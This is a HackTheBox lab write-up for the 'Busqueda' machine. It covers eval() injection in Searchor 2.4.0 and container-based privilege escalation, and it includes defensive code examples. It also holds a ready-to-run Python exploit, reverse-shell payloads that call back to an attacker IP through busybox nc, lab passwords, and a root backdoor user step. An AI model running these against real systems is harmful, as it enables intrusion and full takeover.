Busqueda – HackTheBox Writeup

HackTheBox Writeup – Busqueda (Linux) – Easy Difficulty

Introduction

When I was at my last job, one of the senior pentesters told me that the way he warmed up was by doing an easy difficulty CTF – then he’d move on to the medium difficulty ones. That was my goal for today. It didn’t really work out that way, though – writing the Python exploit script later on took too much time. Other than that, this was a fun box.

Enumeration / Initial Foothold

I start off with some RustScan to enumerate the ports: rustscan 10.10.11.208 --range 1-65535 -- -A -sC -sV | tee nmap.txt

But I don’t find much.

After punching the IP in Firefox, it redirects us to searcher.htb – so we add that to our hosts file.

If you run a search, it constructs a query for any selected web application, as seen below.

If we navigate to the bottom of the page, we can see that it’s Searchor 2.4.0. I assumed this was a website built specifically for HTB, but it turns out to be Searchor, a Python web application. Searching the version of Searchor on Google leads to tons of exploits, but it’s pretty obvious these were created after the machine was published. Let’s not use them – let’s create our own exploit.

We can find the CVE for this particular version of Searchor.

It comes from an insecure use of the eval() function – we can go right to the commit where Searchor was patched and identify the insecure code.

So basically, the vulnerable code is url = eval(f"Engine.{engine}.search('{query}', copy_url={copy}, open_web={open})")

The query part is the POST data we send. Because the whole expression is built as an f-string before eval() sees it, we can close the string literal with an apostrophe, add our own expression as an extra argument to search(), and then use # to comment out the rest of the line. The expression that eval() ends up running looks like this.

url = eval(f"Engine.{engine}.search('{', __import__('os').system('sleep 20')) #}', copy_url={copy}, open_web={open})")
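To make the root cause concrete, here is an added example (my own code, not Searchor’s and not part of the original post) that puts the pre-patch eval() pattern next to a hardened version. The Engine enum is a constructed stand-in that only builds URLs; the real Searchor class also copies and opens them. Instead of a shell command, the injected query calls a harmless sentinel() function, which is enough to show that eval() executes whatever the query contains, while the fixed builder treats the same string as plain search text.

```python
from enum import Enum
from urllib.parse import quote


class Engine(Enum):
    # Constructed stand-in for Searchor's Engine enum (assumption: shape only,
    # the real class has many more members and performs side effects).
    Amazon = "https://www.amazon.com/s?k="
    Google = "https://www.google.com/search?q="

    def search(self, query, copy_url=False, open_web=False):
        # Only builds the URL; copy_url/open_web are accepted to keep the
        # same call signature as the real method.
        return self.value + quote(query, safe="")


def build_url_vulnerable(engine, query, copy=False, open_web=False):
    """Mirrors the pre-patch pattern: user input is pasted into Python source
    text and handed to eval(), so the query is treated as code, not data."""
    return eval(f"Engine.{engine}.search('{query}', copy_url={copy}, open_web={open_web})")


def build_url_fixed(engine, query, copy=False, open_web=False):
    """Hardened form: the engine name is looked up in the enum (unknown names
    are rejected) and the query is passed as an ordinary argument, so nothing
    in it can change which code runs."""
    try:
        member = Engine[engine]
    except KeyError:
        raise ValueError(f"unknown engine {engine!r}") from None
    return member.search(query, copy_url=copy, open_web=open_web)


# Harmless sentinel standing in for the os.system() call in the writeup:
# if it gets called, the query was executed as code.
SENTINEL_CALLS = []


def sentinel():
    SENTINEL_CALLS.append("evaluated")
    return True


def demo():
    """Run both builders on a benign query and on a query shaped like the
    writeup's injection (closing quote, extra argument, trailing #)."""
    injection = "', sentinel()) #"

    SENTINEL_CALLS.clear()
    vuln_url = build_url_vulnerable("Amazon", injection)
    vuln_executed = len(SENTINEL_CALLS) > 0

    SENTINEL_CALLS.clear()
    fixed_url = build_url_fixed("Amazon", injection)
    fixed_executed = len(SENTINEL_CALLS) > 0

    return {
        "vulnerable_url_for_injection": vuln_url,      # query was swallowed, code ran
        "vulnerable_executed_injection": vuln_executed,  # True
        "fixed_url_for_injection": fixed_url,          # injection is just URL-encoded text
        "fixed_executed_injection": fixed_executed,    # False
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The fix is not about filtering apostrophes: as long as the engine name is resolved by a lookup and the query is passed as a normal function argument, the attacker’s text never reaches the parser at all.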

The next part is getting a shell. I cycle through available shells on revshells until I find that busybox calls back to my listener as the user svc, using the POST data: engine=Amazon&query=', __import__('os').system('busybox nc 10.10.14.3 443 -e sh')) #

I wrote the exploit into a python script, which can be found on my github at https://github.com/libertycityhacker/CVE-2023-43364-Exploit-CVE

I will also put it below so you can run it if you don’t want to exploit it yourself.

#!/usr/bin/env python3
import base64
import requests
import time
import sys

print("Please start a netcat listener.")

ipaddress = input("What is your IP address? ")
port = input("What port is the listener using? ")
target = input("What's the target URL for the post form? For example: https://test.com/search ")

# Change the command in payload if you want to use something that is not Busybox.
payload = "busybox nc " + ipaddress + " " + port + " -e bash"
# Base64-encode the command so that no quotes or spaces in it can break the injected expression.
encodedpayload = base64.b64encode(payload.encode("utf-8")).decode("utf-8")
# Close the query string literal, add our expression as an extra argument, and comment out the rest of the line.
exploitcode = "', __import__('os').system('echo " + encodedpayload + " | base64 -d | bash -i')) #"

print(exploitcode)

postdata = {
    "engine": "Amazon",
    "query": exploitcode,
}

print("Now sending a busybox payload that should call back to your listener at port " + port + ".")
requests.post(target, data=postdata)
time.sleep(3)
sys.exit()

Privilege Escalation

In the /var/www/app folder, there’s a .git folder. I download it using pwncat’s native download feature, and in the config file, there’s a password.

cody:jh1usoih2bkjaspwe92 can be used for svc, and this way we can see we have sudo perms for a docker-related script.

We saw earlier that gitea is another subdomain this host serves, so we add gitea.searcher.htb to the hosts file.

We can sign in with the creds we already have for cody but I find nothing useful here.

However, there are some useful notes on docker commands and exploitation at https://exploit-notes.hdks.org/exploit/container/docker/. After running docker-ps to get the container IDs, we can use docker-inspect to dump a container’s config and get more info: sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect --format='{{json .Config}}' f84a6b33fb5a

If you look closely at the output, there is a "MYSQL_PASSWORD=yuiu1hoiu4i5ho1uh" entry in the container’s environment. We can use this password to log on to Gitea as the "administrator" user, which lets us read the scripts we have sudo access to. Before, we could execute them, but we couldn’t read them.
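Secrets passed to containers as environment variables are exactly what docker inspect hands back to anyone allowed to run it, which is the weakness this step abuses. As an added example (my own code, not from the box or the exploit-notes page), here is a small audit helper that parses the {{json .Config}} output, flags environment entries whose names look secret-bearing, and produces a redacted copy safe to paste into a report. The sample config is constructed; its values are placeholders, not the box’s real credentials.

```python
import json
import re

# Constructed sample in the shape of `docker inspect --format='{{json .Config}}'`;
# the hostname and every value are placeholders.
SAMPLE_CONFIG = json.dumps({
    "Hostname": "0123456789ab",
    "Env": [
        "MYSQL_PASSWORD=example-placeholder-password",
        "MYSQL_USER=gitea",
        "MYSQL_DATABASE=gitea",
        "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
        "GOSU_VERSION=1.14",
    ],
    "Image": "mysql:8",
})

# Variable names that usually carry credentials. Extend to taste; the check is
# on the name only, so values are never inspected or logged.
SECRET_NAME_RE = re.compile(r"PASS(WORD)?|SECRET|TOKEN|API_?KEY|PRIVATE", re.IGNORECASE)


def parse_env(config_json):
    """Split Config.Env entries into (name, value) pairs."""
    cfg = json.loads(config_json)
    pairs = []
    for entry in cfg.get("Env", []):
        name, sep, value = entry.partition("=")
        if sep:  # entries without '=' are not variables
            pairs.append((name, value))
    return pairs


def find_env_secrets(config_json):
    """Return the (name, value) pairs whose variable name looks secret-bearing."""
    return [(n, v) for n, v in parse_env(config_json) if SECRET_NAME_RE.search(n)]


def redact_env(config_json):
    """Return the Env list with secret-looking values replaced, for safe reporting."""
    redacted = []
    for name, value in parse_env(config_json):
        if SECRET_NAME_RE.search(name):
            redacted.append(f"{name}=<redacted>")
        else:
            redacted.append(f"{name}={value}")
    return redacted


if __name__ == "__main__":
    for name, _ in find_env_secrets(SAMPLE_CONFIG):
        print(f"secret exposed in container environment: {name}")
    print("\n".join(redact_env(SAMPLE_CONFIG)))
```

On the defensive side the fix is to keep credentials out of the environment altogether: the official MySQL image, for example, accepts MYSQL_PASSWORD_FILE pointing at a mounted secret file instead of MYSQL_PASSWORD, so an inspect only reveals a path.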

Ok, let’s read system-checkup.py

It runs ./full-checkup.sh as a relative path, resolved against whatever directory we execute the command from. So we can drop any file with that name in a directory we control, run the sudo command from there, and our file is executed as root.
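The same bug in miniature, as an added example (my own code, not the box’s system-checkup.py): a resolver that mirrors the relative-path lookup next to a hardened one that only accepts a bare file name, pins it to a trusted directory (the /opt/scripts path is an assumption, not taken from the script), refuses symlinks, and insists the file is owned by the expected user and not writable by anyone else. The demo builds two temporary directories, plants a look-alike helper in the "home" one, and shows where each resolver points.

```python
import os
import stat
import tempfile

# Assumption: where the real helpers should live. Not read from the box.
TRUSTED_DIR = "/opt/scripts"


def helper_path_vulnerable(name, cwd=None):
    """Mirrors the bug: './full-checkup.sh' is resolved against whatever
    directory the sudo caller happens to be in."""
    cwd = cwd or os.getcwd()
    return os.path.join(cwd, name)


def helper_path_fixed(name, trusted_dir=TRUSTED_DIR, expected_uid=0):
    """Hardened lookup: bare file name only, absolute path inside a trusted
    directory, not a symlink, owned by expected_uid (root by default) and not
    group- or world-writable. Raises on any violation instead of running."""
    if name != os.path.basename(name) or name in ("", ".", ".."):
        raise ValueError("helper must be a bare file name")
    path = os.path.join(trusted_dir, name)
    st = os.lstat(path)  # lstat so a planted symlink is seen, not followed
    if stat.S_ISLNK(st.st_mode):
        raise PermissionError(f"{path} is a symlink")
    if not stat.S_ISREG(st.st_mode):
        raise PermissionError(f"{path} is not a regular file")
    if st.st_uid != expected_uid:
        raise PermissionError(f"{path} is not owned by uid {expected_uid}")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        raise PermissionError(f"{path} is group/world writable")
    return path


def demo():
    """Constructed scenario: a low-privileged user's home holds a file with the
    helper's name; the trusted directory holds the real one."""
    with tempfile.TemporaryDirectory() as home, tempfile.TemporaryDirectory() as trusted:
        planted = os.path.join(home, "full-checkup.sh")
        with open(planted, "w") as f:
            f.write("#!/bin/bash\necho planted\n")
        os.chmod(planted, 0o755)

        real = os.path.join(trusted, "full-checkup.sh")
        with open(real, "w") as f:
            f.write("#!/bin/bash\necho real\n")
        os.chmod(real, 0o755)

        # The test process is not root, so the expected owner is ourselves here.
        me = os.getuid()
        vuln = helper_path_vulnerable("full-checkup.sh", cwd=home)
        fixed = helper_path_fixed("full-checkup.sh", trusted_dir=trusted, expected_uid=me)

        # A world-writable helper in the trusted directory is refused as well.
        os.chmod(real, 0o777)
        try:
            helper_path_fixed("full-checkup.sh", trusted_dir=trusted, expected_uid=me)
            refused = False
        except PermissionError:
            refused = True

        return {
            "vulnerable_points_at_planted": vuln == planted,  # True
            "fixed_points_at_trusted": fixed == real,          # True
            "refused_world_writable": refused,                 # True
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The ownership and mode checks matter as much as the absolute path: a root-owned script in a directory that a service account can write to is the same privilege escalation with one extra step.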

I put a basic bash script that adds a user called admin with full sudo privileges in my home directory, run sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup.sh, then su admin. This gives me root access as a superuser, but if you just want to grab the root flag, something like this is enough:

#!/bin/bash

cat /root/flag.txt

Either way we have root privileges.

Lessons Learned

  • Don’t rely on other people’s web exploits, because one day you might need to come up with your own. I didn’t need to today, but I did anyways because I’m rusty in Python and wanted to practice.
  • No privesc? Keep enumerating. Always has been, always will be a good solution.
  • If HackTricks or any other source of info doesn’t work, keep branching out. There’s always information somewhere.

Song Of The Day – We Close Our Eyes by Go West